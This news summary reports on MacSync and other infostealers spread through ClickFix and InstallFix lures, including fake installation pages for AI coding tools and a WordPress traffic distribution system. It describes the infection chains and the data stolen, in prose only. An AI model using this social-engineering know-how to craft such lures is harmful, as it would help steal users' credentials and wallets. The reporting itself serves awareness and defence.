MacSync, a macOS information stealer, is being distributed through three separate ClickFix campaigns that trick users into running malicious terminal commands. Researchers at Sophos — Jagadeesh Chandraiah, Tonmoy Jitu, Dmitry Samosseiko, and Matt Wixey — identified the campaigns, noting the method “relies entirely on user interaction” rather than technical exploits.
Whether the three campaigns share a single threat actor remains unknown. Jamf Threat Labs flagged similar ClickFix lures distributing the same malware back in December 2025.
Once a victim runs the terminal command, a shell script contacts a hard-coded server to retrieve an AppleScript payload — the actual infostealer — while simultaneously wiping traces of the intrusion. The stealer harvests credentials, files, keychain databases, and seed phrases from cryptocurrency wallets.
A Widening Attack Surface
According to the announcement, the most recent variant “likely represents the malware developer adjusting to OS and software security measures to maintain effectiveness.” The lures now weaponize the perceived legitimacy of ChatGPT conversations to convince targets to execute commands.
Separate campaigns — labeled InstallFix or GoogleFix — have used legitimate platforms including Cloudflare Pages, Squarespace, and Tencent EdgeOne to host fake installation instructions for developer tools such as Anthropic‘s Claude Code. Malicious search engine ads distribute the URLs.
On Windows, this infection chain deploys Alien infostealer. On macOS, it drops Atomic Stealer, according to Nati Tal, head of Guardio Labs. The PowerShell command fetches a legitimate Chrome extension package inside a malicious HTML Application file, which then launches an obfuscated .NET loader for Alien directly in memory.
More Read
Push Security noted a key distinction: unlike standard ClickFix attacks that manufacture a fake CAPTCHA or error message to justify running a command, InstallFix requires no such pretext. “The pretext is simply the user wanting to install legit software.”
AI Tools as a Preferred Target
Researchers at Pillar Security counted at least 20 distinct malware campaigns targeting AI and vibe coding tools between February and March 2026. Targets span code editors, AI agents, large language model platforms, AI-powered browser extensions, AI video generators, and AI business tools.
Of those 20 campaigns, nine hit both Windows and macOS. Seven targeted macOS exclusively.
Pillar Security researcher Eilon Cohen explained the skew directly: “AI/vibe coding tool users skew heavily toward macOS, and macOS users tend to have higher-value credentials — SSH keys, cloud tokens, cryptocurrency wallets.” The curl | sh installation pattern used by tools like Homebrew, Rust, and nvm gives malicious commands natural cover.
The same social engineering blueprint has been adopted by a malicious traffic distribution system called KongTuke — also tracked as 404 TDS, Chaya_002, LandUpdate808, and TAG-124. It injects malicious JavaScript into compromised WordPress sites, prompting users to run a PowerShell command that triggers a multi-stage infection chain to deploy a Python-based trojan called ModeloRAT.
This article is a curated summary based on third-party sources. Source: Read the original article
